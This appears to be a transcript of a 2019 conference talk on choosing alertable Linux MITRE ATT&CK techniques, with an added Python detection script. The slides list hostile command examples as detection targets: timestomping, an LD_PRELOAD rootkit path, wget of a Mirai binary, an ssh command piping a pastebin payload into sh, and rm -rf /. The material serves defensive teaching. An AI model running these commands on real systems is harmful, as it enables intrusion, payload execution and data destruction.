Alertable Techniques for Linux using MITRE ATT&CK

Community members continually ask, should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion that not every technique is alertable and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow.

Tony M Lambert

October 29, 2019

Transcript

  1. Alertable Techniques for Linux Using MITRE ATT&CK™

  2. id -un
    Tony Lambert
    Detection Engineer/Intel
    Red Canary
    @ForensicITGuy
    ▪ Find & detect adversaries using data
    ▪ Recovering system administrator
    ▪ Love to teach, hate to grade homework

  3. Overview
    ▪ What’s an alertable technique?
    ▪ Decision criteria for alerting
    ▪ The good, the bad, and the ugly

  4. What’s an alert?
    ▪ Notification of abnormal condition
    ▪ Requires context for triage
    ▪ Requires care and feeding for efficacy

  5. Alert Workflow
    1. Condition occurs
    2. Alert fires
    3. Defender investigates
    4. Escalate or hide

  6. Problems with Alerts
    ▪ High volume by default
    ▪ Lack of context

  7. Decision Criteria for Alerts
    ▪ Time to investigate (lower is better)
    ▪ Significance of abnormality (urgent is better)
    ▪ Time to respond (lower is better)

  8. Alerts that don’t suck

  9. Timestomping (T1099)
    touch -acmr /bin/sh /file/to/timestomp
    ▪ Quick to investigate
    ▪ Significant destruction of evidence

  10. Process Injection (T1055)
    /etc/ld.so.preload
    LD_PRELOAD=/tmp/evil.so
    ▪ Quick to respond
    ▪ Used by rootkits, affects user tools

  11. Masquerading (T1036)
    /tmp/kworkerds
    /dev/shm/kthreadds
    ▪ Quick to investigate
    ▪ Signals significant abnormality
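
The three "alerts that don't suck" above (T1099, T1055, T1036) written as detection checks over process and file telemetry. This is an added illustration, not code from the talk or from Red Canary; the event schema (type, comm, exe, argv, env, path), the imitated kernel-thread names, the "system lib dirs" allow-list and every sample record are assumptions, loosely modelled on what auditd or EDR process telemetry provides.

```python
from typing import Dict, List, Optional

# Kernel-thread names malware imitates; genuine kernel threads have no on-disk executable.
KTHREAD_NAMES = ("kworker", "kthreadd", "ksoftirqd", "migration", "rcu_")
WORLD_WRITABLE = ("/tmp/", "/dev/shm/", "/var/tmp/")

def check_timestomp(ev: Dict) -> Optional[str]:
    """T1099: touch with -r/--reference (copy another file's times) or -t/-d (set them)."""
    argv = ev.get("argv") or []
    if not argv or argv[0].rsplit("/", 1)[-1] != "touch":
        return None
    short = "".join(a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--"))
    if set("rtd") & set(short) or any(a.startswith("--reference") for a in argv):
        return "T1099 timestomping: " + " ".join(argv)
    return None

def check_preload(ev: Dict) -> Optional[str]:
    """T1055: a write to /etc/ld.so.preload, or LD_PRELOAD outside system lib dirs (tune to fit)."""
    if ev.get("type") == "file_write" and ev.get("path") == "/etc/ld.so.preload":
        return f"T1055 write to /etc/ld.so.preload by {ev.get('comm')}"
    preload = (ev.get("env") or {}).get("LD_PRELOAD")
    if preload and not preload.startswith(("/lib", "/usr/lib")):
        return f"T1055 LD_PRELOAD={preload} in {ev.get('comm')}"
    return None

def check_masquerade(ev: Dict) -> Optional[str]:
    """T1036: kernel-thread-like name backed by a binary in a world-writable directory."""
    comm, exe = ev.get("comm", ""), ev.get("exe", "")
    if comm.startswith(KTHREAD_NAMES) and exe.startswith(WORLD_WRITABLE):
        return f"T1036 masquerading: {comm} running from {exe}"
    return None

CHECKS = (check_timestomp, check_preload, check_masquerade)

def triage(events: List[Dict]) -> List[str]:
    """Return one alert string per (event, check) hit, in event order."""
    return [hit for ev in events for chk in CHECKS if (hit := chk(ev))]

# Constructed sample events (not real telemetry): one hit per technique plus benign look-alikes.
SAMPLE_EVENTS = [
    {"type": "process", "comm": "touch", "argv": ["touch", "-acmr", "/bin/sh", "/var/www/html/index.php"]},
    {"type": "process", "comm": "touch", "argv": ["touch", "/tmp/build.lock"]},  # benign: no -r/-t/-d
    {"type": "file_write", "comm": "bash", "path": "/etc/ld.so.preload"},
    {"type": "process", "comm": "sshd", "argv": ["sshd"], "env": {"LD_PRELOAD": "/tmp/evil.so"}},
    {"type": "process", "comm": "kworkerds", "exe": "/tmp/kworkerds", "argv": ["kworkerds"]},
    {"type": "process", "comm": "kworker/0:1", "exe": "", "argv": []},  # genuine kernel thread
]

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_EVENTS)))
```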

  12. We can make these work...

  13. Remote File Copy (T1105)
    curl https://pastebin.com/evilThing
    wget http:///mirai.x86
    ▪ Requires much tuning
    ▪ Hunt for outliers in command line

  14. Remote Services (T1021)
    ssh … [email protected] '(curl
    hxxps://pastebin.com/payload | sh'
    ▪ Tune out deployment tools
    ▪ Significant for lateral movement

  15. Worst. Alerts. Ever.

  16. Anything Discovery
    whoami, netstat, ifconfig, etc.
    ▪ OS noise makes high volume
    ▪ Better for cluster analysis

  17. Sudo (T1169)
    sudo ./make_sandwich.sh
    ▪ Long investigations with little return
    ▪ Better for reporting/audits

  18. File Deletion (T1107)
    rm -rf /
    ▪ Probably non-functional rule
    ▪ Helpdesk will know before the alert

  19. Alert where possible, report/hunt otherwise
    REDCANARY.COM/BLOG

  20. Q & A
    RESOURCES
    https://github.com/bfuzzy1/auditd-attack
    https://github.com/Neo23x0/auditd
